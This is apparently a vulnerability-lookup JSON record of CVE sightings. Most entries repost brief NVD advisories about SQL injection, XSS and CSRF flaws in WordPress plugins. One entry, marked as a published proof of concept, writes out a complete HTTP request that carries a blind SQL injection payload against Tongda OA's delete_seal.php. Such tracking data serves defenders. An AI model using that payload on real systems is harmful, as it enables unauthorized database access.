{"vulnerability": "cve-2023-4165", "sightings": [{"uuid": "f5d526cd-a652-4a82-bdd6-5efe72b80e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41652", "type": "seen", "source": "https://t.me/cibsecurity/73521", "content": "\u203c CVE-2023-41652 \u203c\n\nImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-11-03T15:23:26.000000Z"}, {"uuid": "f6e4c38b-a14d-417e-a096-5d2338e8cd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41656", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mb6cyenwnm2e", "content": "", "creation_timestamp": "2025-12-30T02:37:13.274064Z"}, {"uuid": "41196796-2b1f-4056-b80e-ddd5c536bdd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41658", "type": "seen", "source": "https://t.me/cibsecurity/71305", "content": "\u203c CVE-2023-41658 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Photo Gallery Slideshow & Masonry Tiled Gallery plugin <=\u00a01.0.13 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:56.000000Z"}, {"uuid": "53b9f705-5679-42a6-aa26-d27b26fb34e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41657", "type": "seen", "source": "https://t.me/cibsecurity/71302", "content": "\u203c CVE-2023-41657 \u203c\n\nAuth. 
(admin+) Stored Cross-Site Scripting (XSS) vulnerability in Groundhogg Inc. HollerBox plugin <=\u00a02.3.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:52.000000Z"}, {"uuid": "878749e6-f952-412c-82ff-7e5ccf89114b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41655", "type": "seen", "source": "https://t.me/cibsecurity/71297", "content": "\u203c CVE-2023-41655 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Andreas Heigl authLdap plugin <=\u00a02.5.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:47.000000Z"}, {"uuid": "be4fd763-d8ee-4186-983c-74e2502b7850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4165", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/858", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4165  POC\n\nGET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc\n#poc", "creation_timestamp": "2023-08-12T14:58:46.000000Z"}, {"uuid": "1702c1ec-a08b-4055-837c-5982bca4f5f7", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41659", "type": "seen", "source": "https://t.me/cibsecurity/71728", "content": "\u203c CVE-2023-41659 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Jules Colle, BDWM Responsive Gallery Grid plugin <=\u00a02.3.10 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:42.000000Z"}, {"uuid": "f4b1bf4a-4d47-4593-b606-76977678ba2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41650", "type": "seen", "source": "https://t.me/cibsecurity/71725", "content": "\u203c CVE-2023-41650 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Venugopal Remove/hide Author, Date, Category Like Entry-Meta plugin <=\u00a02.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:39.000000Z"}, {"uuid": "a869d187-22dd-4c6b-b1e3-9fc45a08da0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41654", "type": "seen", "source": "https://t.me/cibsecurity/71721", "content": "\u203c CVE-2023-41654 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Andreas Heigl authLdap plugin <=\u00a02.5.8 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:35.000000Z"}]}